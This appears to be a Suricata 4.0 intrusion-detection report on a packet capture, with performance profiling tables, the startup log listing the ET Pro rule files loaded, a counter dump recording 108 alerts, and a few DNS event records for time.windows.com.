flow                    IPv4       6           585             4760          41390          5933          3.5m  0.48  
flow                    IPv4      17            54             4766          43424          8756        472.9k  0.06  
stream                  IPv4       6           639             5180        9423700         48900         31.2m  4.28  
app-layer               IPv4      17            54             4442          68508         10295        556.0k  0.08  
detect                  IPv4       1            37            95824         191434        110589          4.1m  0.56  
detect                  IPv4       2             2           129150         131566        130358        260.7k  0.04  
detect                  IPv4       6           639            77064       23848000       1038166        663.4m  90.84 
detect                  IPv4      17            54           241012        1054726        430767         23.3m  3.19  
tcp-prune               IPv4       6           639             4456          26442          5215          3.3m  0.46  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            55             4958          21788          6327        348.0k  57.27 
http                    IPv4      17             1            99478          99478         99478         99.5k  16.37 
dns                     IPv4      17            11             9356          29804         14564        160.2k  26.36 
Proto detect            IPv4      17            11             5238          31450         11898        130.9k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6           106            19094          91312         33903          3.6m  9.63  
LOGGER_ALERT_FAST           IPv4      17             1            59622          59622         59622         59.6k  0.16  
LOGGER_UNIFIED2             IPv4       6           106            23196          75734         35853          3.8m  10.18 
LOGGER_UNIFIED2             IPv4      17             1           149722         149722        149722        149.7k  0.40  
LOGGER_JSON_ALERT           IPv4       6           106            41508         118570         63805          6.8m  18.12 
LOGGER_JSON_ALERT           IPv4      17             1            89248          89248         89248         89.2k  0.24  
LOGGER_JSON_DNS             IPv4      17             8            42462        6838276        965133          7.7m  20.68 
LOGGER_JSON_HTTP            IPv4       6           105            32358         133378         41323          4.3m  11.62 
LOGGER_JSON_FILE            IPv4       6           157            49580         181860         68895         10.8m  28.97 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1            37             5024          23966          9206       340.7k  0.51  
payload                           IPv4       6           420             4476         180786         26109        11.0m  16.43 
payload                           IPv4      17            54             6524         173958         42245         2.3m  3.42  
stream                            IPv4       6           420             4434         245326         39367        16.5m  24.77 
http_uri                          IPv4       6           105             7356          34286         11250         1.2m  1.77  
http_request_line                 IPv4       6           105             5644          29460          7988       838.8k  1.26  
http_client_body                  IPv4       6           105             4712          73324         19220         2.0m  3.02  
http_header (request)             IPv4       6           105            17156        8282622        121490        12.8m  19.11 
http_header (request trailer)     IPv4       6           105             4462           6076          4558       478.7k  0.72  
http_header_names (request)       IPv4       6           105             7772          43706         14204         1.5m  2.23  
http_accept (request)             IPv4       6           105             4832          24272          5502       577.8k  0.87  
http_referer (request)            IPv4       6           105             4676          21500          5386       565.6k  0.85  
http_content_len (request)        IPv4       6           105             4744          25308          5877       617.2k  0.92  
http_content_type (request)       IPv4       6           105             4678          32832          8584       901.3k  1.35  
http_protocol (request)           IPv4       6           105             4856          25484          5880       617.5k  0.93  
http_start (request)              IPv4       6           105             7744          29996         10481         1.1m  1.65  
http_raw_header (request)         IPv4       6           105            11298          35864         15356         1.6m  2.42  
http_method                       IPv4       6           105             5704          30868          7089       744.4k  1.12  
http_cookie (request)             IPv4       6           105             4674           7026          5015       526.6k  0.79  
http_raw_uri                      IPv4       6           105             5192           8944          5882       617.7k  0.93  
http_user_agent                   IPv4       6           105             6220          33316          8322       873.9k  1.31  
http_host                         IPv4       6           105             5642          22656          7191       755.1k  1.13  
dns_query                         IPv4      17             4            13544          21202         16267        65.1k  0.10  
http_response_line                IPv4       6           105             4784          26296          6653       698.7k  1.05  
http_header (response)            IPv4       6           105             9354          92942         27321         2.9m  4.30  
http_header (response trailer)    IPv4       6           105             4516          27496          8285       870.0k  1.30  
http_content_type (response)      IPv4       6           105             5130          33770          8899       934.5k  1.40  
http_raw_header (response)        IPv4       6           105            12688          37972         14933         1.6m  2.35  
http_cookie (response)            IPv4       6           105             4782          23726          5526       580.3k  0.87  
http_stat_code                    IPv4       6           105             4732          34392          7242       760.5k  1.14  
Total                             IPv4                  3560                                         18747        66.7m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             2            41334          57018         49176         98.4k  0.01  
PROF_DETECT_IPONLY          IPv4       2             2            47166          49380         48273         96.5k  0.01  
PROF_DETECT_IPONLY          IPv4       6           108             6348       23698060        255851         27.6m  2.80  
PROF_DETECT_IPONLY          IPv4      17             9            42088         113690         64759        582.8k  0.06  
PROF_DETECT_RULES           IPv4       1            37             4434          32412          5466        202.2k  0.02  
PROF_DETECT_RULES           IPv4       2             2             4434           4472          4453          8.9k  0.00  
PROF_DETECT_RULES           IPv4       6           639             4436        8208796        751372        480.1m  48.69 
PROF_DETECT_RULES           IPv4      17            54            62900         747520        262565         14.2m  1.44  
PROF_DETECT_STATEFUL_START    IPv4       6           263             9022        2575616        875991        230.4m  23.36 
PROF_DETECT_STATEFUL_START    IPv4      17             1            17430          17430         17430         17.4k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       1            37             4412           6644          4760        176.1k  0.02  
PROF_DETECT_STATEFUL_CONT    IPv4       2             2             4448           4470          4459          8.9k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6           639             4398          64154          8436          5.4m  0.55  
PROF_DETECT_STATEFUL_CONT    IPv4      17            54             4436          53280          6541        353.3k  0.04  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           423             4472          22560          5006          2.1m  0.21  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             8             4582           5236          4849         38.8k  0.00  
PROF_DETECT_PREFILTER       IPv4       1            37            32410          56598         38567          1.4m  0.14  
PROF_DETECT_PREFILTER       IPv4       2             2            13618          13744         13681         27.4k  0.00  
PROF_DETECT_PREFILTER       IPv4       6           639            13602        8703810        165291        105.6m  10.71 
PROF_DETECT_PREFILTER       IPv4      17            54            42654         218142         86086          4.6m  0.47  
PROF_DETECT_PF_PAYLOAD      IPv4       1            37            14106          33726         18874        698.3k  0.07  
PROF_DETECT_PF_PAYLOAD      IPv4       6           420            29738         264086         80013         33.6m  3.41  
PROF_DETECT_PF_PAYLOAD      IPv4      17            54            15364         183098         52701          2.8m  0.29  
PROF_DETECT_PF_TX           IPv4       6           423             4630        8562390        124338         52.6m  5.33  
PROF_DETECT_PF_TX           IPv4      17             4            24182          31286         26285        105.1k  0.01  
PROF_DETECT_PF_SORT1        IPv4       6           420             4552          44742          7693          3.2m  0.33  
PROF_DETECT_PF_SORT1        IPv4      17            54             4766           8900          6245        337.2k  0.03  
PROF_DETECT_PF_SORT2        IPv4       1            37             4408          17426          4935        182.6k  0.02  
PROF_DETECT_PF_SORT2        IPv4       2             2             4420           4478          4449          8.9k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6           639             4406          25554          5402          3.5m  0.35  
PROF_DETECT_PF_SORT2        IPv4      17            54             4474          20916          5496        296.8k  0.03  
PROF_DETECT_NONMPMLIST      IPv4       1            37             4436           5826          4761        176.2k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       2             2             4430           4728          4579          9.2k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6           639             4430          30834          5147          3.3m  0.33  
PROF_DETECT_NONMPMLIST      IPv4      17            54             4450           8156          5128        276.9k  0.03  
PROF_DETECT_ALERT           IPv4       1            37             4416          48436          6161        228.0k  0.02  
PROF_DETECT_ALERT           IPv4       2             2             4444           4448          4446          8.9k  0.00  
PROF_DETECT_ALERT           IPv4       6           639             4408          31856          5005          3.2m  0.32  
PROF_DETECT_ALERT           IPv4      17            54             4416          21836          5539        299.2k  0.03  
PROF_DETECT_CLEANUP         IPv4       1            37             4440          20090          5076        187.8k  0.02  
PROF_DETECT_CLEANUP         IPv4       2             2             4440           4462          4451          8.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6           639             4450          32914          5265          3.4m  0.34  
PROF_DETECT_CLEANUP         IPv4      17            54             4416          30816          5425        293.0k  0.03  
PROF_DETECT_GETSGH          IPv4       1            37             4436           5758          4806        177.9k  0.02  
PROF_DETECT_GETSGH          IPv4       2             2             4688           4712          4700          9.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6           639             4414          30374          5879          3.8m  0.38  
PROF_DETECT_GETSGH          IPv4      17            54             4432          30948          6569     

This file has been truncated.


suricata-report-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (17766 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/04c847a258b82858fa76434ef923317756b33745cb75ec8c950e11a498e082d2 -r /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap -vvv -k none
elapsedtime:22.122302
stderr:
stdout:
25/7/2019 -- 05:57:14 - <Info> - Configuration node 'rule-files' redefined.
25/7/2019 -- 05:57:14 - <Notice> - This is Suricata version 4.0.0 RELEASE
25/7/2019 -- 05:57:14 - <Info> - CPUs/cores online: 1
25/7/2019 -- 05:57:14 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33758 and 'request-body-inspect-window' set to 16758 after randomization.
25/7/2019 -- 05:57:14 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31522 and 'response-body-inspect-window' set to 17173 after randomization.
25/7/2019 -- 05:57:14 - <Config> - DNS request flood protection level: 500
25/7/2019 -- 05:57:14 - <Config> - DNS per flow memcap (state-memcap): 524288
25/7/2019 -- 05:57:14 - <Config> - DNS global memcap: 16777216
25/7/2019 -- 05:57:14 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
25/7/2019 -- 05:57:14 - <Config> - preallocated 1000 hosts of size 136
25/7/2019 -- 05:57:14 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
25/7/2019 -- 05:57:14 - <Config> - using magic-file /usr/share/file/magic
25/7/2019 -- 05:57:14 - <Config> - Core dump size is unlimited.
25/7/2019 -- 05:57:14 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
25/7/2019 -- 05:57:14 - <Config> - preallocated 1000 defrag trackers of size 168
25/7/2019 -- 05:57:14 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
25/7/2019 -- 05:57:14 - <Config> - stream "prealloc-sessions": 2048 (per thread)
25/7/2019 -- 05:57:14 - <Config> - stream "memcap": 33554432
25/7/2019 -- 05:57:14 - <Config> - stream "midstream" session pickups: disabled
25/7/2019 -- 05:57:14 - <Config> - stream "async-oneside": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "checksum-validation": disabled
25/7/2019 -- 05:57:14 - <Config> - stream."inline": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "bypass": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "max-synack-queued": 5
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "memcap": 134217728
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "depth": 0
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "toserver-chunk-size": 2519
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "toclient-chunk-size": 2580
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly.raw: enabled
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "segment-prealloc": 2048
25/7/2019 -- 05:57:14 - <Config> - Delayed detect disabled
25/7/2019 -- 05:57:14 - <Config> - pattern matchers: MPM: ac, SPM: bm
25/7/2019 -- 05:57:14 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
25/7/2019 -- 05:57:14 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
25/7/2019 -- 05:57:14 - <Config> - prefilter engines: MPM
25/7/2019 -- 05:57:14 - <Config> - IP reputation disabled
25/7/2019 -- 05:57:14 - <Perf> - Registered 148 keyword profiling counters.
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
25/7/2019 -- 05:57:19 - <Config> - No rules loaded from ET-icmp.rules.
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
25/7/2019 -- 05:57:27 - <Config> - No rules loaded from local.rules.
25/7/2019 -- 05:57:27 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
25/7/2019 -- 05:57:27 - <Info> - Threshold config parsed: 0 rule(s) found
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tcp-packet
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tcp-stream
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for udp-packet
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for other-ip
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_uri
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_request_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_client_body
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_response_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header_names
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header_names
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept_enc
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept_lang
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_referer
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_connection
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_len
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_len
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_type
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_type
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_start
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_start
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_method
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_cookie
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_cookie
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_uri
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_user_agent
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_host
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_host
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_stat_msg
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_stat_code
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dns_query
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_sni
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_issuer
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_subject
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_serial
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dce_stub_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dce_stub_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_software
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_software
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for file_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for file_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_request_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_response_line
25/7/2019 -- 05:57:28 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
25/7/2019 -- 05:57:28 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
25/7/2019 -- 05:57:28 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
25/7/2019 -- 05:57:28 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
25/7/2019 -- 05:57:28 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
25/7/2019 -- 05:57:28 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
25/7/2019 -- 05:57:28 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
25/7/2019 -- 05:57:28 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
25/7/2019 -- 05:57:33 - <Perf> - Unique rule groups: 104
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver TCP packet": 35
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient TCP packet": 17
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver TCP stream": 33
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient TCP stream": 19
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver UDP packet": 27
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient UDP packet": 17
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "other IP packet": 3
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_uri": 14
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_request_line": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_client_body": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_response_line": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_header": 10
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_header": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_header_names": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_accept": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_referer": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_content_len": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_content_type": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_content_type": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_protocol": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_start": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_method": 5
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_cookie": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_cookie": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_host": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver dns_query": 4
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver tls_sni": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver file_data": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient file_data": 7
25/7/2019 -- 05:57:36 - <Perf> - Registered 39590 rule profiling counters.
25/7/2019 -- 05:57:36 - <Info> - fast output device (regular) initialized: alert
25/7/2019 -- 05:57:36 - <Info> - eve-log output device (regular) initialized: eve.json
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'alert'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'http'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'dns'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'tls'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'files'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'ssh'
25/7/2019 -- 05:57:36 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
25/7/2019 -- 05:57:36 - <Info> - stats output device (regular) initialized: stats.log
25/7/2019 -- 05:57:36 - <Config> - AutoFP mode using "Hash" flow load balancer
25/7/2019 -- 05:57:36 - <Info> - reading pcap file /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df

This file has been truncated.


stats.log (3072 bytes)
------------------------------------------------------------------------------------
Date: 7/25/2019 -- 05:57:36 (uptime: 0d, 00h 00m 00s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 682
decoder.bytes                              | Total                     | 213040
decoder.invalid                            | Total                     | 1
decoder.ipv4                               | Total                     | 678
decoder.ethernet                           | Total                     | 682
decoder.tcp                                | Total                     | 585
decoder.udp                                | Total                     | 54
decoder.icmpv4                             | Total                     | 37
decoder.avg_pkt_size                       | Total                     | 312
decoder.max_pkt_size                       | Total                     | 1434
flow.tcp                                   | Total                     | 54
flow.udp                                   | Total                     | 8
decoder.ethernet.pkt_too_small             | Total                     | 1
tcp.sessions                               | Total                     | 54
tcp.syn                                    | Total                     | 54
tcp.synack                                 | Total                     | 54
tcp.rst                                    | Total                     | 52
detect.alert                               | Total                     | 108
detect.mpm_list                            | Total                     | 17
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 16
app_layer.flow.http                        | Total                     | 54
app_layer.tx.http                          | Total                     | 105
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 4
app_layer.flow.failed_udp                  | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 5
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65531
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7076896


eve.json (175831 bytes)
{"timestamp":"1900-01-00T00:00:09.368261+0000","flow_id":609649133461125,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3285,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2218,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":68,"rdata":"51.141.32.51"}}
